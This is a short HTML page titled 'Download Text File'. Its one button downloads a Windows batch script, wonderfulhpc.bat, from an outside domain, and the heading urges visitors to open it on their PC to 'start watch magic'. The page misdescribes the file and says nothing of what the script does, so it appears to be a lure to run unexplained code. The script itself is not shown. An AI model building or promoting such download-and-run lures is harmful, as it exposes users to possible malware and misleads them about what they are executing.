<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Download Text File</title>
<style>
.button {
    background-color: yellow;
    border: none;
    color: black;
    padding: 15px 32px;
    text-align: center;
    text-decoration: none;
    display: inline-block;
    font-size: 16px;
    margin: 4px 2px;
    cursor: pointer;
    border-radius: 12px;
}
.button:hover {
    background-color: #45a049;
}
</style>
</head>
<body>
    <div>
       <h3>Click on the Download button  and  Open from your pc and start watch magic :  </h3> 
    </div>
<a class="button" href="https://jobbitee.com/bangladesh/bat/wonderfulhpc.bat" download>Download </a>
</body>
</html>
